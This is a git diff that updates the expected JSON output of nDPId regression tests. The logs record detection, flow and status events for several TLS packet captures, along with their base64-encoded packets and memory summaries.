@@ -0,0 +1,24 @@ +00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_false_positives.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_false_positives.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1641232761063} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1641232761063,"flow_last_seen":1641232761063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1641232761063,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1445,"dst_port":20979,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1641232761063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1641232761063,"pkt":"AAAAAAAAAAcAi3YBCABFAAA0AABAADcGbxAKCgoBwKgAAQWlUfMZL\/oS1g972YASchBrdgAAAgQFtAEBBAIBAwMK"} +00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1641232761612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1641232761612,"pkt":"AAAAAAAAAAcAi3YBCABFAACs+xRAAD4GbIPAqAABCgoKAVHzBaXWD3vZGS\/6E1AYBVnujAAAhAAAAAKIJwDIAAUJDggAAAAEAFNDuAsEAAEAAAAEAFND8wMEAGAAAAAFAGFidmVyBAAxMDA3CwBjb3VudHJ5Y29kZQIAT00DAGlzcAcAT29yZWRvbwIAb3MHAGFuZHJvaWQHAHNka3R5cGUEAG5lcnYLAHZlcnNpb25jb2RlBAA0ODIz"} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1641232761626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1641232761626,"pkt":"AAAAAAAAAAcAi3YBCABFAAA1cw1AADcG\/AEKCgoBwKgAAQWlUfMZL\/oT1g98XVAYAB4RGgAADQAAAAKJJwDIAA4BAA=="} 
+00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":30,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1641232761063,"flow_last_seen":1641232767465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":35681,"flow_avg_l4_payload_len":1189,"midstream":0,"thread_ts_msec":1641232767465,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1445,"dst_port":20979,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"tls_false_positives.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1641232761063,"flow_last_seen":1641232767465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":35681,"flow_avg_l4_payload_len":1189,"midstream":0,"thread_ts_msec":1641232767465,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1445,"dst_port":20979,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"tls_false_positives.pcapng","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":35681,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1641232767465} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 30/30 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 35681 bytes +~~ total detected protocols..: 
0 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6005995 bytes +~~ total memory freed........: 6005995 bytes +~~ total allocations/frees...: 120907/120907 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 477 chars +~~ json string max len.......: 647 chars +~~ json string avg len.......: 559 chars diff --git a/test/results/tls_invalid_reads.pcap.out b/test/results/tls_invalid_reads.pcap.out index fe1373ca8..7cae5414a 100644 --- a/test/results/tls_invalid_reads.pcap.out +++ b/test/results/tls_invalid_reads.pcap.out 
@@ -4,34 +4,35 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859884,"pkt":"ABy\/OaUlABTRQblQCABFIBA0ZLoAADYGSUrOIT1xwKgKZQG7D3++yAIvc1S1coASFtCGmAAAAgQFtAEBBAIBAwMx"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"} 
-00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
-00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":1431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1421985541772} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1252380859942,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
+00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":1431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1421985541772} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1421985541772,"pkt":"AAOf2SAhEFbKCIWJCABFAAAyM2VAAH8GFrhKUKBjQ9lNHAy6AbvQcb+g7Sa+J1AY\/QKZOwAlAAMBAAUBAAABAQ=="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoTo","breed":"Acceptable","category":"VoIP"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1544035479538} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1544035479538} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479538} 
00449{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAGDVegAA\/xG3XAruJEAK7vQxCGgIaABMAAAw\/wA8B+zklkUAADyx3UAAQAbcAwq\/ixE23eAt5LgBu\/kVfJ4AAAAAoAL\/\/3GmAAACBAW0BAIICgAUzUMAAAAAAQMDBg=="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479721} 00444{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQAMn4EAAAIIAEVoAGBxLwAAOxHfqAru9DEK7iRACGgIaABMAAAw\/wA8AABhskUAADwAAEAA5Abp4Dbd4C0Kv4sRAbvkuBpaSBv5FXyfoBJxILDEAAACBAV4BAIICh1e0BYAFM1DAQMDCA=="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479768} 
00723{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAS7V9AAA\/xG2FAruJEAK7vQxCGgIaAEaAAAw\/wEKB+zklkUAAOux30AAQAbbUgq\/ixE23eAt5LgBu\/kVfJ8aWkgcgBgFWRb9AAABAQgKABTNax1e0BYWAwEAsgEAAK4DA+Jfj3VZ7Se+llOF2hoK\/0SOWa4JB8kGoFPipHXr6zI3AAAowCvALMAvwDAAngCfwAnACsATwBQAMwA5wAfAEQCcAJ0ALwA1AAUA\/wEAAF0AAAAWABQAABFlLmNyYXNobHl0aWNzLmNvbQAXAAAAIwAAAA0AFgAUBgEGAwUBBQMEAQQDAwEDAwIBAgMAEAALuImlL1Y1GeVflD5H40\/GlDV3w0Q4eHATzs15UMvq3bDFbT9WBxf4WY7WsXHZhuEm\/fgNJZccyFnwUKMb"} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoTo","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7580000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1544035479768} +00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1441,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1544035479768} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/9 ~~ skipped flows.............: 0 ~~ total layer4 data length..: 1441 bytes -~~ total detected protocols..: 2 +~~ total detected protocols..: 1 ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874866 bytes -~~ total memory freed........: 5874866 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6008500 bytes +~~ total memory freed........: 6008500 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 200 chars -~~ json string max len.......: 950 chars +~~ json string max len.......: 951 chars ~~ json string avg len.......: 575 chars 
diff --git a/test/results/tls_long_cert.pcap.out b/test/results/tls_long_cert.pcap.out index fd7e86912..021ee9c47 100644 --- a/test/results/tls_long_cert.pcap.out +++ b/test/results/tls_long_cert.pcap.out 
@@ -4,10 +4,10 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1553619078033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1553619078033,"pkt":"BBjWMe9aeDHBvV4kCABFAABAAABAAEAGN8XAqAJ+aG\/XXesOAbssL+yBAAAAALAC\/\/8wZwAAAgQFtAEDAwYBAQgKJK\/ZdwAAAAAEAgAA"} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1553619078058,"pkt":"eDHBvV4kBBjWMe9aCABFAAA8AABAADYGQclob9ddwKgCfgG76w4xmkZeLC\/sgqAScSAcqQAAAgQFtAQCCArQt2rgJK\/ZdwEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1553619078058,"pkt":"BBjWMe9aeDHBvV4kCABFAAA0AABAAEAGN9HAqAJ+aG\/XXesOAbssL+yCMZpGX4AQCAq0dAAAAQEICiSv2Y7Qt2rg"} 
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
